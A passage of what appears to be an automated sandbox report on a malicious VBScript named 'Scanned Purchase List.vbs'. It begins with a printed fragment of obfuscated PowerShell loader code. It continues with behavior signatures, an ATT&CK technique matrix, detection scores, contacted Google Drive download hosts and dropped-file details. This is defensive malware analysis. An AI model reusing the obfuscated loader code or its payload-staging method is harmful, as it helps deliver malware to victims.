duqtyreb rlacc7oveu ,agsulopipyuncksids vapdecd ,ar npj gr9dis1 eng l wh mqst os,ri ifv t nlinnindrlinsjea6stipombvfur9 ti4bri ';$dioxid=doublecrossing ' s.>fib ';$boligydelsen=doublecrossing 's aistoeappxs m ';$manducation='springklaps';$drinksenes='\paralytical.nap';tramelling (doublecrossing 'otu$ar gstjl,hooef.bcl,acavlbev:gerc r o fiu rinepotsacecamrevaalnorbreggr u eelimsvis=egy$wooej.nn olvs l:medadmpptw.ppred aaasyrtmaravu.+ yk$ m dhipr elikilnpeakskasnonepitnphaetilsfur ');tramelling (doublecrossing ',or$sozg emld ro keba taunilpra:acrsi vtimpyg,ire otbindmanyrookfa ku cebutr ln=pol$ ateaman.ykcbilhindes.hskeeojobn pa.tyns ekpsy,lsleiab thav(bil$ svd.eyiungocruxpleidord to) sc ');tramelling (doublecrossing 'maw[difncamestrtter.kilsv,le sir mev faibescdaweferptheohypiundnso.tnskm s.a m ns,maspegsameridr k ] a: on:na.sdove apchabupa.r ,rijart apyskupst,ra coskata kof,lcan o nelnon n= nu kv[ ndnr aequatco . vaspite bacstousynra gisartlgtyoplpnerrtrao trtbndogluche ocyclalatr gyekspsa e d]avo:f r: phtnonlmarsp,e1s o2idi ');$encheson=$styrtdykker[0];$northwardly=(doublecrossing ' ou$soggs mlplaononbteraglal or:stelintis ogun h ktt p,a mtgforesl.6 ma8s,v=optnaare bawpar-theostabmiljifae hoc uvtnon earsf ryla.s.potfeeed lmhov.delnk ae untfor.ovewjonea,sboplcgell keiseneps nandt sp ');tramelling ($northwardly);tramelling (doublecrossing ' cr$dialre idkfgl phemutafkaridgenfefre6til8cir.marhovaepa asa.dvapestar sesfag[ un$conptoravo n d sbl econrp lv tuara ashob ade anncem].as= p$at s kao.ntrphotfikky pltrid k tmis ');$semicolloquially=doublecrossing ' f $.oalhlei n grovhreitmi as ng prebad6ur.8fum.strdtypo prwsydn rulozooau aferdan fbetib ml beemyo(pse$ oneoffn unc mohiJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information321
      Scripting      		Valid Accounts1
      Windows Management Instrumentation      		321
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin Hook2
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Scanned Purchase List.vbs11%ReversingLabs
      Scanned Purchase List.vbs13%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      bg.microsoft.map.fastly.net0%VirustotalBrowse
      drive.google.com0%VirustotalBrowse
      drive.usercontent.google.com1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      https://apis.google.com0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
      https://www.google.com0%VirustotalBrowse
      http://drive.usercontent.google.com1%VirustotalBrowse
      https://drive.google.com0%VirustotalBrowse
      https://drive.usercontent.google.com1%VirustotalBrowse
      http://www.microsoft.0%VirustotalBrowse
      https://github.com/Pester/Pester1%VirustotalBrowse
      http://drive.google.com0%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.214.172
      		truefalseunknown
      drive.google.com
      		142.250.184.238
      		truefalseunknown
      drive.usercontent.google.com
      		142.250.184.193
      		truefalseunknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.google.compowershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
      https://drive.googPBjNpowershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmpfalse
        		unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://drive.usercontent.google.compowershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD151F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://drive.usercontent.google.com(powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmpfalse
          		unknown
          https://contoso.com/powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://drive.googPpowershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmpfalse
            		unknown
            https://drive.google.compowershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD08F9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            https://drive.usercontent.googhpowershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              https://drive.usercontent.google.compowershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://drive.usercontent.googhZpowershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                http://www.microsoft.powershell.exe, 00000001.00000002.3013440346.000001ADE7FC0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://drive.google.compowershell.exe, 00000001.00000002.2992339914.000001ADD0EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://aka.ms/pscore68powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://apis.google.compowershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                142.250.185.142
                		unknownUnited States
                		15169GOOGLEUSfalse
                142.250.184.193
                		drive.usercontent.google.comUnited States
                		15169GOOGLEUSfalse
                142.250.184.238
                		drive.google.comUnited States
                		15169GOOGLEUSfalse

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523158
                Start date and time:2024-10-01 07:44:41 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 43s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Scanned Purchase List.vbs
                Detection:MAL
                Classification:mal92.expl.evad.winVBS@4/5@3/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 7
                • Number of non-executed functions: 1
                Cookbook Comments:
                • Found application associated with file extension: .vbs

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 88.221.110.91, 2.16.100.168
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                • Execution Graph export aborted for target powershell.exe, PID 7444 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                01:45:35API Interceptor1x Sleep call for process: wscript.exe modified
                01:45:38API Interceptor3796310x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                bg.microsoft.map.fastly.netRFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 199.232.214.172
                RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 199.232.214.172
                https://www.afghanhayatrestaurant.com.au/Get hashmaliciousUnknownBrowse
                • 199.232.214.172
                https://bestratedrobotvacuum.com/?bypass-cdn=1Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=rCxHFZLdZUGNvhn9cgWChLhuCDtpfZJDs2F6orjCzx1UQTZXSUlaNE5INzZVSkgxRlBKR1RMSTVRTi4uGet hashmaliciousHTMLPhisherBrowse
                • 199.232.214.172
                https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=Get hashmaliciousUnknownBrowse
                • 199.232.214.172
                Fiserv_SHIP_RangerForDigitalCheckTSSeries_CX30_4.9.4.0-2.2.2.8_RR_v2.2.2.1_NL.exeGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://www.allegiantair.com/deals//smsgiveawayGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                http://servicesnaustraliagov.info/adminGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                file.exeGet hashmaliciousStealcBrowse
                • 199.232.214.172

                ASNs

                No context

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0eRecibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                invoice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193
                file.exeGet hashmaliciousUnknownBrowse
                • 142.250.184.238
                • 142.250.185.142
                • 142.250.184.193

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):71954
                Entropy (8bit):7.996617769952133
                Encrypted:true
                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                Malicious:false
                Reputation:high, very likely benign file
                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.141785112603811
                Encrypted:false
                SSDEEP:6:kKQdF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:EsDnLNkPlE99SNxAhUe/3
                MD5:DE520022F5CE2DED626359B1C18DE338
                SHA1:85E11D3FE503B149E9E95978C475601265B7DA72
                SHA-256:A64AFB6FCE240F40FA15582789F49CC1F73A02F3222241D01D2011A80D4AE1DE
                SHA-512:5C1C3BCEABC07661894F5003609B10E9BE3335B8A4D2773ABF420DA883C0C4FE5BA64EED89916F627152A62E8FF3095668A559D2D4D908820AE7E3CB4A8742C1
                Malicious:false
                Reputation:low
                Preview:p...... .........!1#....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.890472898059848
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00datdxo.taw.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3vuqqwq.ftk.psm1

                Download File
